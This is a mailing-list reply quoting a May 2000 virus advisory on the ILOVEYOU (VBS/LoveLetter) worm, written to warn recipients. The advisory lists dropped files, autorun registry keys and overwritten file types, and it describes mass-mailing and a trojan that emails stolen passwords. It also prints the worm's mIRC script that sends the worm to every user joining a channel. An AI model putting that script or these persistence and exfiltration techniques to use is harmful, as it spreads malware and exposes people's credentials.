thanks for the heads up re the virus Hans, it looks like a nasty one tex ----- Original Message ----- From: "Hans van der Genugten" <[log in to unmask]> To: <[log in to unmask]> Sent: Thursday, May 04, 2000 11:34 AM Subject: VIRUSWARNING: High risk e-mail virus "I love you" > Virus Name: VBS/LoveLetter.worm > Aliases: none known > Date Discovered: Thursday May 4th 2000 > DAT included: 4077 > Risk: High > > Characteristics: > > This worm is a VBS program that is sent attached to an email with the > subject ILOVEYOU. > The mail contains the message "kindly check the attached LOVELETTER coming > from me." > The attachment is called LOVE-LETTER-FOR-YOU.TXT.vbs > If the user runs the attachment the worm runs using the Windows Scripting > Host program. This is not normally present on Windows 95 or Windows NT > unless Internet Explorer 5 is installed. > > When the worm is first run it drops copies of itself in the following > places :- > > C:\WINDOWS\SYSTEM\MSKERNEL32.VBS > C:\WINDOWS\WIN32DLL.VBS > C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.TXT.VBS > > It also adds the registry keys :- > HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ > MSKernel32=C:\WINDOWS\SYSTEM\MSKernel32.vbs > HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\ > Win32DLL=C:\WINDOWS\Win32DLL.vbs > in order to run the worm at system start-up. > > The worm replaces the following files :- > *.JPG > *.JPEG > *.MP3 > *.MP2 > with copies of itself and it adds the extension .VBS to the original > filename. So PICT.JPG would be replaced with PICT.JPG.VBS and this would > contain the worm. > > The worm also overwrites the following files :- > *.VBS > *.VBE > *.JS > *.JSE > *.CSS > *.WSH > *.SCT > *.HTA > with copies of itself and renames the files to *.VBS. > > The worm creates a file LOVE-LETTER-FOR-YOU.HTM which contains the worm and > this is then sent to the IRC channels if the mIRC client is installed. This > is accomplished by the worm replacing the file SCRIPT.INI with the following > script :- > > [script] > n0=on 1:JOIN:#:{ > n1= /if ( $nick == $me ) { halt } > n2= /.dcc send $nick C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.HTM > n3=} > > After a short delay the worm uses Microsoft Outlook to send copies of itself > to all entries in the address book. > The mails will be of the same format as the original mail. > > This worm also has another trick up it's sleeve in that it tries to download > and install an executable file called WIN-BUGSFIX.EXE from the Internet. > This exe file is a password stealing program that will email any cached > passwords to the mail address [log in to unmask] > > In order to facilitate this download the worm sets the start-up page of > Microsoft Internet Explorer to point to the web-page containing the password > stealing trojan. > > The email sent by this program is as follows :- > From: [log in to unmask]: [log in to unmask]: Barok... > email.passwords.sender.trojanX-Mailer: Barok... > email.passwords.sender.trojan---by: spyderHost: goat1Username: Goat1IP > Address: 192.168.0.2 > RAS Passwords:... > <password information goes here> > ... > Cache Passwords:... > <password information goes here> > ... > goatserver.goatnet/goatserver.goatnet : GOATNET\goat1: > MAPI : MAPI > > The password stealing trojan is also installed via the following registry > key :- > HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX > to auto run at system start-up. > > After it has been run the password stealing trojan copies itself to > WINDOWS\SYSTEM\WinFAT32.EXE and replaces the registry key with > HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinFAT32=Wi > nFAT32.EXE >